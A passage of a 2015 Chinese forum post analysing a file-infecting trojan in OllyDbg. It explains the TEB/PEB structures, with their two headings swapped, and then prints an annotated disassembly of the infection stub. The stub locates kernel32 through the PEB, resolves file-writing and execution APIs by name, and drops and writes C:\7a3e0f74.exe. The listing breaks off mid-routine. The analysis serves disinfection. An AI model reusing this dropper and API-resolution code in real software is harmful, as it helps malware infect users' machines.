宝峰科技

 找回密码
 注册

QQ登录

只需一步,快速开始

智能终端设备维修查询系统注册会员邮箱认证须知!
查看: 7748|回复: 4

[原创] OD 分析全盘EXE感染型木马病毒,小红伞报 TR/Crypt.XPACK.Gen

  [复制链接]
  • TA的每日心情
    奋斗
    2020-6-5 22:18
  • 签到天数: 22 天

    [LV.4]偶尔看看III

    潇潇 发表于 2015-5-5 02:39:00 | 显示全部楼层 |阅读模式
            前段时间不小心运行了一个加壳工具,结果除系统盘外几乎所有的EXE文件全被感染了……记得几年前感染过一次,也是除系统盘以外的所有EXE感染,但几年前被感染后的EXE文件只要在虚拟机里运行一次,就会恢复出非感染文件,所以那次感染之后,需用到的程序中EXE文件,先在虚拟机里运行后再复制过来覆盖就可以,实际上那次感染后的至今没修复完,因有些工具不常用了。这次感染的感觉和上次不一样,实际上找修复工具也是空谈了,经常也是杀光光,所以下定决心亲自分析下并打算写个修复工具……
            目标文件,本机已经被感染OD工具目录中的 loaddll_木马.exe ,其它不多说直接入正题。
            在分析这个被感染的文件之前先了解和学习下如何利用 PEB 查找 kener32 地址,学习这个还要了解下 TEB 结构。        首先,我们先来认识下什么是 PEB 和 TEB:
            PEB 是 Process Environment Block 的缩写,也就是进程环境块; TEB 是 Thread Environment Block 的缩写,也就是线程环境块。我们先来看下几个结构体。

    PEB结构:
    [C++] 纯文本查看 复制代码
    //
    // Thread Environment Block (TEB)
    //
    typedef struct _TEB
    {
        NT_TIB Tib;                             /* 00h */
        PVOID EnvironmentPointer;               /* 1Ch */
        CLIENT_ID Cid;                          /* 20h */
        PVOID ActiveRpcHandle;                  /* 28h */
        PVOID ThreadLocalStoragePointer;        /* 2Ch */
       struct _PEB *ProcessEnvironmentBlock;   /* 30h */
        ULONG LastErrorValue;                   /* 34h */
        ULONG CountOfOwnedCriticalSections;     /* 38h */
        PVOID CsrClientThread;                  /* 3Ch */
        struct _W32THREAD* Win32ThreadInfo;     /* 40h */
        ULONG User32Reserved[0x1A];             /* 44h */
        ULONG UserReserved[5];                  /* ACh */
        PVOID WOW32Reserved;                    /* C0h */
        LCID CurrentLocale;                     /* C4h */
        ULONG FpSoftwareStatusRegister;         /* C8h */
        PVOID SystemReserved1[0x36];            /* CCh */
        LONG ExceptionCode;                     /* 1A4h */
        struct _ACTIVATION_CONTEXT_STACK *ActivationContextStackPointer; /* 1A8h */
        UCHAR SpareBytes1[0x28];                /* 1ACh */
        GDI_TEB_BATCH GdiTebBatch;              /* 1D4h */
        CLIENT_ID RealClientId;                 /* 6B4h */
        PVOID GdiCachedProcessHandle;           /* 6BCh */
        ULONG GdiClientPID;                     /* 6C0h */
        ULONG GdiClientTID;                     /* 6C4h */
        PVOID GdiThreadLocalInfo;               /* 6C8h */
        ULONG Win32ClientInfo[62];              /* 6CCh */
        PVOID glDispatchTable[0xE9];            /* 7C4h */
        ULONG glReserved1[0x1D];                /* B68h */
        PVOID glReserved2;                      /* BDCh */
        PVOID glSectionInfo;                    /* BE0h */
        PVOID glSection;                        /* BE4h */
        PVOID glTable;                          /* BE8h */
        PVOID glCurrentRC;                      /* BECh */
        PVOID glContext;                        /* BF0h */
        NTSTATUS LastStatusValue;               /* BF4h */
        UNICODE_STRING StaticUnicodeString;     /* BF8h */
        WCHAR StaticUnicodeBuffer[0x105];       /* C00h */
        PVOID DeallocationStack;                /* E0Ch */
        PVOID TlsSlots[0x40];                   /* E10h */
        LIST_ENTRY TlsLinks;                    /* F10h */
        PVOID Vdm;                              /* F18h */
        PVOID ReservedForNtRpc;                 /* F1Ch */
        PVOID DbgSsReserved[0x2];               /* F20h */
        ULONG HardErrorDisabled;                /* F28h */
        PVOID Instrumentation[14];              /* F2Ch */
        PVOID SubProcessTag;                    /* F64h */
        PVOID EtwTraceData;                     /* F68h */
        PVOID WinSockData;                      /* F6Ch */
        ULONG GdiBatchCount;                    /* F70h */
        BOOLEAN InDbgPrint;                     /* F74h */
        BOOLEAN FreeStackOnTermination;         /* F75h */
        BOOLEAN HasFiberData;                   /* F76h */
        UCHAR IdealProcessor;                   /* F77h */
        ULONG GuaranteedStackBytes;             /* F78h */
        PVOID ReservedForPerf;                  /* F7Ch */
        PVOID ReservedForOle;                   /* F80h */
        ULONG WaitingOnLoaderLock;              /* F84h */
        ULONG SparePointer1;                    /* F88h */
        ULONG SoftPatchPtr1;                    /* F8Ch */
        ULONG SoftPatchPtr2;                    /* F90h */
        PVOID *TlsExpansionSlots;               /* F94h */
        ULONG ImpersionationLocale;             /* F98h */
        ULONG IsImpersonating;                  /* F9Ch */
        PVOID NlsCache;                         /* FA0h */
        PVOID pShimData;                        /* FA4h */
        ULONG HeapVirualAffinity;               /* FA8h */
        PVOID CurrentTransactionHandle;         /* FACh */
        PTEB_ACTIVE_FRAME ActiveFrame;          /* FB0h */
        PVOID FlsData;                          /* FB4h */
        UCHAR SafeThunkCall;                    /* FB8h */
        UCHAR BooleanSpare[3];                  /* FB9h */
    } TEB, *PTEB;

    TEB结构:
    [C++] 纯文本查看 复制代码
    typedef struct _PEB
    {
        UCHAR InheritedAddressSpace; // 00h
        UCHAR ReadImageFileExecOptions; // 01h
        UCHAR BeingDebugged; // 02h
        UCHAR Spare; // 03h
        PVOID Mutant; // 04h
        PVOID ImageBaseAddress; // 08h
        PPEB_LDR_DATA Ldr; // 0Ch
        PRTL_USER_PROCESS_PARAMETERS ProcessParameters; // 10h
        PVOID SubSystemData; // 14h
        PVOID ProcessHeap; // 18h
        PVOID FastPebLock; // 1Ch
        PPEBLOCKROUTINE FastPebLockRoutine; // 20h
        PPEBLOCKROUTINE FastPebUnlockRoutine; // 24h
        ULONG EnvironmentUpdateCount; // 28h
        PVOID* KernelCallbackTable; // 2Ch
        PVOID EventLogSection; // 30h
        PVOID EventLog; // 34h
        PPEB_FREE_BLOCK FreeList; // 38h
        ULONG TlsExpansionCounter; // 3Ch
        PVOID TlsBitmap; // 40h
        ULONG TlsBitmapBits[0x2]; // 44h
        PVOID ReadOnlySharedMemoryBase; // 4Ch
        PVOID ReadOnlySharedMemoryHeap; // 50h
        PVOID* ReadOnlyStaticServerData; // 54h
        PVOID AnsiCodePageData; // 58h
        PVOID OemCodePageData; // 5Ch
        PVOID UnicodeCaseTableData; // 60h
        ULONG NumberOfProcessors; // 64h
        ULONG NtGlobalFlag; // 68h
        UCHAR Spare2[0x4]; // 6Ch
        LARGE_INTEGER CriticalSectionTimeout; // 70h
        ULONG HeapSegmentReserve; // 78h
        ULONG HeapSegmentCommit; // 7Ch
        ULONG HeapDeCommitTotalFreeThreshold; // 80h
        ULONG HeapDeCommitFreeBlockThreshold; // 84h
        ULONG NumberOfHeaps; // 88h
        ULONG MaximumNumberOfHeaps; // 8Ch
        PVOID** ProcessHeaps; // 90h
        PVOID GdiSharedHandleTable; // 94h
        PVOID ProcessStarterHelper; // 98h
        PVOID GdiDCAttributeList; // 9Ch
        PVOID LoaderLock; // A0h
        ULONG OSMajorVersion; // A4h
        ULONG OSMinorVersion; // A8h
        ULONG OSBuildNumber; // ACh
        ULONG OSPlatformId; // B0h
        ULONG ImageSubSystem; // B4h
        ULONG ImageSubSystemMajorVersion; // B8h
        ULONG ImageSubSystemMinorVersion; // C0h
        ULONG GdiHandleBuffer[0x22]; // C4h
        PVOID ProcessWindowStation; // ???
    } PEB, *PPEB;

    PEB_LDR_DATA结构:
    [C++] 纯文本查看 复制代码
    typedef struct _PEB_LDR_DATA
    {
     ULONG Length; // +0x00
     BOOLEAN Initialized; // +0x04
     PVOID SsHandle; // +0x08
     LIST_ENTRY InLoadOrderModuleList; // +0x0c
     LIST_ENTRY InMemoryOrderModuleList; // +0x14
     LIST_ENTRY InInitializationOrderModuleList;// +0x1c
    } PEB_LDR_DATA,*PPEB_LDR_DATA; // +0x24

    LIST_ENTRY结构:
    [C++] 纯文本查看 复制代码
    typedef struct _LIST_ENTRY {
       struct _LIST_ENTRY *Flink;
       struct _LIST_ENTRY *Blink;
    } LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;


    根据上面的了解,获取kernel32.dll的基地址原理为:在NT内核系统中fs寄存器指向TEB结构,TEB+0x30处指向PEB结构,PEB+0x0c处指向PEB_LDR_DATA结构,PEB_LDR_DATA+0x1c处存放一些动态链接库地址,第一个指向ntdl.dll,第二个就是kernel32.dll的基地址了。在反汇编中如下:

    [Asm] 纯文本查看 复制代码
    MOV EAX,DWORD PTR FS:[0x30]           ; FS指向TEB结构体内存地址,0x30处是PEB(Process Environment Block)的结构地址
    MOV EAX,DWORD PTR DS:[EAX+0xC]           ; EAX=[7FFDE00C]=00081E90-->PEB_LDR_DATA 的基址
    MOV EAX,DWORD PTR DS:[EAX+0x1C]          ; EAX=[00081EAC]=00081F28 --> InInitializationOrderModuleList 进程当前已加载模块的链表
    MOV EAX,DWORD PTR DS:[EAX]               ; EAX=[00081F28]=00081FD0 --> Flink地址
    MOV EAX,DWORD PTR DS:[EAX+0x8]           ; 变量赋值:EAX=[00081FD8]=7C800000 --> kernel32.dll的基址


    知识点:以后在反汇编代码中看到类似 MOV EAX,DWORD PTR FS:[0x30] 的汇编代码一定 TEB 和 PEB 有关的,记住后就方便分析了。

    其次,我们现在来分析被感染的loaddll_木马.exe,OD截入目标文件,如图所示:


    [Asm] 纯文本查看 复制代码
    00460000 >  55              PUSH EBP                                 ; OD载入后被感染程序停留在了新增加的代码入口处
    00460001    8BEC            MOV EBP,ESP
    00460003    81EC 84000000   SUB ESP,0x84
    00460009    8365 EC 00      AND DWORD PTR SS:[EBP-0x14],0x0
    0046000D    8365 B0 00      AND DWORD PTR SS:[EBP-0x50],0x0
    00460011    8365 E0 00      AND DWORD PTR SS:[EBP-0x20],0x0
    00460015    8365 F0 00      AND DWORD PTR SS:[EBP-0x10],0x0
    00460019    8365 FC 00      AND DWORD PTR SS:[EBP-0x4],0x0
    0046001D    E8 00000000     CALL 00460022                            ; 注意这里,如果直接F8单步木马文件就会生成并开始感染,所以F7进入。
    00460022    58              POP EAX
    00460023    05 90020000     ADD EAX,0x290                            ; EAX=00460022 再加上0x290得到004602B2,CALL 00460022 地址尾 RETN地址
    00460028    8945 E8         MOV DWORD PTR SS:[EBP-0x18],EAX          ; 变量赋值:[0006FFA8]=004602B2
    0046002B    64:A1 30000000  MOV EAX,DWORD PTR FS:[0x30]              ; FS指向TEB结构体内存地址,0x30处是PEB(Process Environment Block)的结构地址
    00460031    8945 D8         MOV DWORD PTR SS:[EBP-0x28],EAX          ; 变量赋值:[0006FF98]=7FFDE000
    00460034    C745 C4 433A5C3>MOV DWORD PTR SS:[EBP-0x3C],0x375C3A43   ; 常量赋值:[0006FF84]=0x375C3A43 开始在地址0006FF84生成一个C盘根目录下名为7a3e0f74.exe的路径
    0046003B    C745 C8 6133653>MOV DWORD PTR SS:[EBP-0x38],0x30653361   ; 常量赋值:[0006FF88]=0x30653361
    00460042    C745 CC 6637342>MOV DWORD PTR SS:[EBP-0x34],0x2E343766   ; 常量赋值:[0006FF8C]=0x2E343766
    00460049    C745 D0 6578650>MOV DWORD PTR SS:[EBP-0x30],0x657865     ; 常量赋值:[0006FF90]=0x657865;[0006FF84]="C:\7a3e0f74.exe"
    00460050    8B45 D8         MOV EAX,DWORD PTR SS:[EBP-0x28]          ; 变量赋值:EAX=[0006FF98]=7FFDE000-->PEB结构地址
    00460053    8B40 0C         MOV EAX,DWORD PTR DS:[EAX+0xC]           ; EAX=[7FFDE00C]=00081E90-->PEB_LDR_DATA 的基址
    00460056    8B40 1C         MOV EAX,DWORD PTR DS:[EAX+0x1C]          ; EAX=[00081EAC]=00081F28 --> InInitializationOrderModuleList 进程当前已加载模块的链表
    00460059    8B00            MOV EAX,DWORD PTR DS:[EAX]               ; EAX=[00081F28]=00081FD0 --> Flink地址
    0046005B    8945 E4         MOV DWORD PTR SS:[EBP-0x1C],EAX          ; 变量赋值:[0006FFA4]=00081FD0 --> Flink地址
    0046005E    8B45 E4         MOV EAX,DWORD PTR SS:[EBP-0x1C]          ; 变量赋值:EAX=[0006FFA4]=00081FD0 --> Flink地址
    00460061    8B40 08         MOV EAX,DWORD PTR DS:[EAX+0x8]           ; 变量赋值:EAX=[00081FD8]=7C800000 --> kernel32.dll的基址
    00460064    8945 F4         MOV DWORD PTR SS:[EBP-0xC],EAX           ; 变量赋值:[0006FFB4]=7C800000 --> kernel32.dll的基址
    00460067    8B45 E8         MOV EAX,DWORD PTR SS:[EBP-0x18]          ; EAX=[0006FFA8]=004602B2 -->取函数尾地址
    0046006A    C700 83C404E9   MOV DWORD PTR DS:[EAX],0xE904C483        ; [EAX]=[004602B2]=0xE904C483 --> 在此函数RETN地址处开始写入8字节,以便在执行完木马代码段跳转到非感染程序入口
    00460070    8B45 E8         MOV EAX,DWORD PTR SS:[EBP-0x18]          ; EAX=[0006FFA8]=004602B2 -->取函数尾地址
    00460073    C740 04 B6FDFAF>MOV DWORD PTR DS:[EAX+0x4],0xFFFAFDB6    ; [EAX+4]=[004602B6]=0xFFFAFDB6 --> 在此函数RETN地址+4处写入整数,目的是执行完木马代码段跳转到非感染程序入口处
    0046007A    8B45 F4         MOV EAX,DWORD PTR SS:[EBP-0xC]           ; EAX=[0006FFB4]=7C800000 --> kernel32.dll地址
    0046007D    8B40 3C         MOV EAX,DWORD PTR DS:[EAX+0x3C]          ; EAX=[7C80003C]=000000F0 --> [kernel32.dll+0x3C] "PE"偏移量
    00460080    8B4D F4         MOV ECX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    00460083    8B55 F4         MOV EDX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    00460086    035401 78       ADD EDX,DWORD PTR DS:[ECX+EAX+0x78]      ; EDX=7C80262C --> kernel32.7C80262C 输出表地址
    0046008A    8955 DC         MOV DWORD PTR SS:[EBP-0x24],EDX          ; ntdll.KiFastSystemCallRet
    0046008D    8B45 DC         MOV EAX,DWORD PTR SS:[EBP-0x24]          ; EAX=[0006FF9C]=7C80262C (kernel32.7C80262C)
    00460090    8B4D F4         MOV ECX,DWORD PTR SS:[EBP-0xC]           ; ECX=[0006FFB4]=7C800000 (kernel32.7C800000)
    00460093    0348 1C         ADD ECX,DWORD PTR DS:[EAX+0x1C]          ; ECX=7C802654 (kernel32.7C802654) 未知
    00460096    894D BC         MOV DWORD PTR SS:[EBP-0x44],ECX
    00460099    8B45 DC         MOV EAX,DWORD PTR SS:[EBP-0x24]          ; kernel32.7C80262C
    0046009C    8B4D F4         MOV ECX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    0046009F    0348 20         ADD ECX,DWORD PTR DS:[EAX+0x20]          ; ECX=7C803538 --> 函数地址
    004600A2    894D B4         MOV DWORD PTR SS:[EBP-0x4C],ECX
    004600A5    8B45 DC         MOV EAX,DWORD PTR SS:[EBP-0x24]          ; kernel32.7C80262C
    004600A8    8B4D F4         MOV ECX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    004600AB    0348 24         ADD ECX,DWORD PTR DS:[EAX+0x24]          ; ECX=7C80441C (kernel32.7C80441C) 函数地址尾?
    004600AE    894D B8         MOV DWORD PTR SS:[EBP-0x48],ECX
    004600B1    8365 8C 00      AND DWORD PTR SS:[EBP-0x74],0x0          ; [0006FF4C]=0
    004600B5    EB 07           JMP SHORT 004600BE                       ; 004600BE
    004600B7    8B45 8C         MOV EAX,DWORD PTR SS:[EBP-0x74]          ; 循环体开始,循环取函数名称
    004600BA    40              INC EAX                                  ; 自加1
    004600BB    8945 8C         MOV DWORD PTR SS:[EBP-0x74],EAX
    004600BE    8B45 DC         MOV EAX,DWORD PTR SS:[EBP-0x24]          ; i=0 EAX=[0006FF9C]=7C80262C (kernel32.7C80262C)
    004600C1    8B4D 8C         MOV ECX,DWORD PTR SS:[EBP-0x74]
    004600C4    3B48 18         CMP ECX,DWORD PTR DS:[EAX+0x18]          ; 当i=0时,ECX和输出表函数个数0x3B9比较,如果ECX<0x3B9,则不跳;如果ECX>0x3B9,则跳转
    004600C7    0F83 61010000   JNB 0046022E                             ; 0046022E
    004600CD    8B45 8C         MOV EAX,DWORD PTR SS:[EBP-0x74]          ; 当i=0时,EAX=[0006FF4C]=0
    004600D0    8B4D B8         MOV ECX,DWORD PTR SS:[EBP-0x48]          ; kernel32.7C80441C
    004600D3    0FB70441        MOVZX EAX,WORD PTR DS:[ECX+EAX*2]        ; 当i=0时,EAX=0
    004600D7    8B4D BC         MOV ECX,DWORD PTR SS:[EBP-0x44]          ; kernel32.7C802654
    004600DA    8B55 F4         MOV EDX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    004600DD    031481          ADD EDX,DWORD PTR DS:[ECX+EAX*4]         ; 当i=0时,EDX=7C80A6D4 (kernel32.ActivateActCtx)
    004600E0    8955 88         MOV DWORD PTR SS:[EBP-0x78],EDX          ; ntdll.KiFastSystemCallRet
    004600E3    8B45 8C         MOV EAX,DWORD PTR SS:[EBP-0x74]          ; 当i=0时,EAX=[0006FF4C]=0
    004600E6    8B4D B4         MOV ECX,DWORD PTR SS:[EBP-0x4C]          ; kernel32.7C803538
    004600E9    8B55 F4         MOV EDX,DWORD PTR SS:[EBP-0xC]           ; kernel32.7C800000
    004600EC    031481          ADD EDX,DWORD PTR DS:[ECX+EAX*4]         ; 当i=0时,EDX=7C804B9B (kernel32.7C804B9B), ASCII "ActivateActCtx"
    004600EF    8955 84         MOV DWORD PTR SS:[EBP-0x7C],EDX          ; ntdll.KiFastSystemCallRet
    004600F2    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004600F5    8138 4765744D   CMP DWORD PTR DS:[EAX],0x4D746547        ; 当i=0时,[EAX]=[7C804B9B]=69746341 和 0x4D746547比较 ,[EAX]>0x4D746547 跳转;如果[EAX]=0x4D746547,则不跳
    004600FB    75 6A           JNZ SHORT 00460167                       ; 00460167
    004600FD    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; 当i=0x173时,EAX=[0006FF44]=7C806773 (kernel32.7C806773), ASCII "GetMailslotInfo"
    00460100    8178 04 6F64756>CMP DWORD PTR DS:[EAX+0x4],0x6C75646F    ; 当i=0x173时,[EAX+4]=[7C806777]=736C6961,0x736C6961>0x6C75646F时,则跳实现;[EAX+0x4]=0x6C75646F时,则不跳
    00460107    75 5E           JNZ SHORT 00460167                       ; 00460167
    00460109    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; 当i=0x174时经过,EAX=[0006FF44]=7C806783 (kernel32.7C806783), ASCII "GetModuleFileNameA"
    0046010C    8178 08 6548616>CMP DWORD PTR DS:[EAX+0x8],0x6E614865    ; 当i=0x174时,[EAX+8]=[7C80678B]=6C694665,6C694665<0x6E614865时,则跳实现;当i=0x176时,[EAX+8]=[7C8067B1]=6E614865=0x6E614865 则不跳
    00460113    75 52           JNZ SHORT 00460167                       ; 00460167
    00460115    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; 当i=0x176时,EAX=[0006FF44]=7C8067A9 (kernel32.7C8067A9), ASCII "GetModuleHandleA"
    00460118    8178 0C 646C654>CMP DWORD PTR DS:[EAX+0xC],0x41656C64    ; 当i=0x176时,不跳
    0046011F    75 46           JNZ SHORT 00460167                       ; 00460167
    00460121    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    00460124    8B40 10         MOV EAX,DWORD PTR DS:[EAX+0x10]
    00460127    25 FF000000     AND EAX,0xFF                             ; 当i=0x176时,EAX=0
    0046012C    75 39           JNZ SHORT 00460167                       ; 当i=0x176时,未跳??
    0046012E    837D EC 00      CMP DWORD PTR SS:[EBP-0x14],0x0          ; [EBP-0x14]=00000000=0x0,则不跳;第二次大循环时当i=0x176时跳转
    00460132    75 2E           JNZ SHORT 00460162                       ; 00460162
    00460134    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; kernel32.WriteFile
    00460137    8945 EC         MOV DWORD PTR SS:[EBP-0x14],EAX
    0046013A    C745 90 4B65726>MOV DWORD PTR SS:[EBP-0x70],0x6E72654B   ; 从地址0006FF50开始写入Kernel32.dll名称
    00460141    C745 94 656C333>MOV DWORD PTR SS:[EBP-0x6C],0x32336C65
    00460148    C745 98 2E646C6>MOV DWORD PTR SS:[EBP-0x68],0x6C6C642E
    0046014F    8365 9C 00      AND DWORD PTR SS:[EBP-0x64],0x0
    00460153    8D45 90         LEA EAX,DWORD PTR SS:[EBP-0x70]          ; EAX=0006FF50, (ASCII "Kernel32.dll")
    00460156    50              PUSH EAX
    00460157    FF55 EC         CALL DWORD PTR SS:[EBP-0x14]             ; kernel32.GetModuleHandleA
    0046015A    8945 F4         MOV DWORD PTR SS:[EBP-0xC],EAX
    0046015D  ^ E9 18FFFFFF     JMP 0046007A                             ; 0046007A
    00460162    E9 A2000000     JMP 00460209                             ; 00460209
    00460167    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    0046016A    8138 43726561   CMP DWORD PTR DS:[EAX],0x61657243        ; 当i=0x173时,[EAX]=[7C806773]=4D746547,0x4D746547<0x61657243,则跳实现
    00460170    75 20           JNZ SHORT 00460192                       ; 00460192
    00460172    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    00460175    8178 04 7465466>CMP DWORD PTR DS:[EAX+0x4],0x69466574
    0046017C    75 14           JNZ SHORT 00460192                       ; 00460192
    0046017E    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; 第二次大循环当i=0x4D时经过,EAX=[0006FF44]=7C805143 (kernel32.7C805143), ASCII "CreateFiber"
    00460181    8178 08 6C65410>CMP DWORD PTR DS:[EAX+0x8],0x41656C
    00460188    75 08           JNZ SHORT 00460192                       ; 00460192
    0046018A    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; 第二次大循环当i=0x4F时经过,EAX=[0006FF48]=7C801A28 (kernel32.CreateFileA)
    0046018D    8945 B0         MOV DWORD PTR SS:[EBP-0x50],EAX
    00460190    EB 77           JMP SHORT 00460209                       ; 00460209
    00460192    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    00460195    8138 57726974   CMP DWORD PTR DS:[EAX],0x74697257        ; 当i=0时,[EAX]=[7C804B9B]=69746341 < 0x74697257 跳转
    0046019B    75 24           JNZ SHORT 004601C1                       ; 004601C1
    0046019D    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601A0    8178 04 6546696>CMP DWORD PTR DS:[EAX+0x4],0x6C694665
    004601A7    75 18           JNZ SHORT 004601C1                       ; 004601C1
    004601A9    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; 第二次大循环当i=0x38F时,EAX=[0006FF44]=7C808DCB (kernel32.7C808DCB), ASCII "WriteFile"
    004601AC    8B40 08         MOV EAX,DWORD PTR DS:[EAX+0x8]
    004601AF    25 FFFF0000     AND EAX,0xFFFF
    004601B4    83F8 65         CMP EAX,0x65                             ; 第二次大循环当i=0x38F时,EAX=0x65,则不跳
    004601B7    75 08           JNZ SHORT 004601C1                       ; 004601C1
    004601B9    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; kernel32.WriteFile
    004601BC    8945 E0         MOV DWORD PTR SS:[EBP-0x20],EAX
    004601BF    EB 48           JMP SHORT 00460209                       ; 00460209
    004601C1    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601C4    8138 436C6F73   CMP DWORD PTR DS:[EAX],0x736F6C43        ; 当i=0时,[EAX]=[7C804B9B]=69746341 < 0x736F6C43 跳转
    004601CA    75 20           JNZ SHORT 004601EC                       ; 004601EC
    004601CC    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601CF    8178 04 6548616>CMP DWORD PTR DS:[EAX+0x4],0x6E614865    ; 第二次大循环时经过
    004601D6    75 14           JNZ SHORT 004601EC                       ; 004601EC
    004601D8    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601DB    8178 08 646C650>CMP DWORD PTR DS:[EAX+0x8],0x656C64
    004601E2    75 08           JNZ SHORT 004601EC                       ; 004601EC
    004601E4    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; kernel32.WriteFile
    004601E7    8945 F0         MOV DWORD PTR SS:[EBP-0x10],EAX
    004601EA    EB 1D           JMP SHORT 00460209                       ; 00460209
    004601EC    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; kernel32.7C808DCB
    004601EF    8138 57696E45   CMP DWORD PTR DS:[EAX],0x456E6957        ; 当i=0时,[EAX]=[7C804B9B]=69746341 > 0x456E6957 跳转
    004601F5    75 12           JNZ SHORT 00460209                       ; 00460209
    004601F7    8B45 84         MOV EAX,DWORD PTR SS:[EBP-0x7C]          ; 第二次大循环当i=0x383时,EAX=[0006FF44]=7C808CD7 (kernel32.7C808CD7), ASCII "WinExec"
    004601FA    8178 04 7865630>CMP DWORD PTR DS:[EAX+0x4],0x636578      ; 第二次大循环当i=0x383时,[EAX+4]=[7C808CDB]=00636578 和比较值相等,则不跳
    00460201    75 06           JNZ SHORT 00460209                       ; 00460209
    00460203    8B45 88         MOV EAX,DWORD PTR SS:[EBP-0x78]          ; kernel32.WriteFile
    00460206    8945 FC         MOV DWORD PTR SS:[EBP-0x4],EAX
    00460209    837D EC 00      CMP DWORD PTR SS:[EBP-0x14],0x0          ; [0006FFAC]和0相等时跳转;  第二次大循环时,[0006FFAC]=7C80B731 (kernel32.GetModuleHandleA)
    0046020D    74 1A           JE SHORT 00460229                        ; 00460229
    0046020F    837D B0 00      CMP DWORD PTR SS:[EBP-0x50],0x0          ; 第二次开始循环时,[0006FF70]=7C801A28 (kernel32.CreateFileA)
    00460213    74 14           JE SHORT 00460229                        ; 00460229
    00460215    837D E0 00      CMP DWORD PTR SS:[EBP-0x20],0x0          ; 第二次大循环时,[0006FFA0]=7C810E17 (kernel32.WriteFile)
    00460219    74 0E           JE SHORT 00460229                        ; 00460229
    0046021B    837D F0 00      CMP DWORD PTR SS:[EBP-0x10],0x0          ; 第二次大循环时,[0006FFB0]=7C809BD7 (kernel32.CloseHandle)
    0046021F    74 08           JE SHORT 00460229                        ; 00460229
    00460221    837D FC 00      CMP DWORD PTR SS:[EBP-0x4],0x0           ; 第二次大循环时,当i=0x38F时,[0006FFBC]=7C8623AD (kernel32.WinExec)
    00460225    74 02           JE SHORT 00460229                        ; 00460229
    00460227    EB 05           JMP SHORT 0046022E                       ; 0046022E
    00460229  ^ E9 89FEFFFF     JMP 004600B7                             ; 循环尾
    0046022E    6A 00           PUSH 0x0                                 ; 第二次大循环当i=0x38F时,开始创建木马文件
    00460230    68 80000000     PUSH 0x80
    00460235    6A 02           PUSH 0x2
    00460237    6A 00           PUSH 0x0
    00460239    6A 00           PUSH 0x0
    0046023B    68 000000C0     PUSH 0xC0000000
    00460240    8D45 C4         LEA EAX,DWORD PTR SS:[EBP-0x3C]          ; EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
    00460243    50              PUSH EAX                                 ; 压栈 EAX=0006FF84, (ASCII "C:\7a3e0f74.exe")
    00460244    FF55 B0         CALL DWORD PTR SS:[EBP-0x50]             ; kernel32.CreateFileA
    00460247    8945 C0         MOV DWORD PTR SS:[EBP-0x40],EAX          ; EAX=00000034
    0046024A    837D C0 FF      CMP DWORD PTR SS:[EBP-0x40],-0x1
    0046024E    74 61           JE SHORT 004602B1                        ; 木马文件 7a3e0f74.exe 创建成功则不跳转
    00460250    8B45 E8         MOV EAX,DWORD PTR SS:[EBP-0x18]          ; 创建木马文件函数尾地址EAX=[0006FFA8]=004602B2 (loaddll_.004602B2)
    00460253    8945 80         MOV DWORD PTR SS:[EBP-0x80],EAX
    00460256    83A5 7CFFFFFF 0>AND DWORD PTR SS:[EBP-0x84],0x0
    0046025D    EB 0D           JMP SHORT 0046026C                       ; 0046026C
    0046025F    8B85 7CFFFFFF   MOV EAX,DWORD PTR SS:[EBP-0x84]          ; 循环开始
    00460265    40              INC EAX
    00460266    8985 7CFFFFFF   MOV DWORD PTR SS:[EBP-0x84],EAX
    0046026C    81BD 7CFFFFFF F>CMP DWORD PTR SS:[EBP-0x84],0x1F4        ; 如果[EBP-0x84]<0x1F4,则不跳转
    00460276    7D 39           JGE SHORT 004602B1                       ; 004602B1
    00460278    8B45 80         MOV EAX,DWORD PTR SS:[EBP-0x80]          ; loaddll_.004602BA
    0046027B    8138 4D5A9000   CMP DWORD PTR DS:[EAX],0x905A4D          ; [EAX]=[004602B2]=E904C483 和 0x905A4D 比较,这里就不多写了,只要相等时就不跳转;当i=8时,[EAX]=[004602BA]=00905A4D和比较值相等,则不跳
    00460281    75 25           JNZ SHORT 004602A8                       ; 004602A8
    00460283    6A 00           PUSH 0x0                                 ; 这里开始向所创建的木马文件写入数据
    00460285    8D45 F8         LEA EAX,DWORD PTR SS:[EBP-0x8]           ; EAX=0006FFB8
    00460288    50              PUSH EAX
    00460289    68 004C0100     PUSH 0x14C00
    0046028E    FF75 80         PUSH DWORD PTR SS:[EBP-0x80]             ; loaddll_.004602BA
    00460291    FF75 C0         PUSH DWORD PTR SS:[EBP-0x40]             ; 所创建文件句柄0x34
    00460294    FF55 E0         CALL DWORD PTR SS:[EBP-0x20]             ; kernel32.WriteFile
    00460297    FF75 C0         PUSH DWORD PTR SS:[EBP-0x40]             ; 木马文件句柄,写入后下面一行关闭句柄
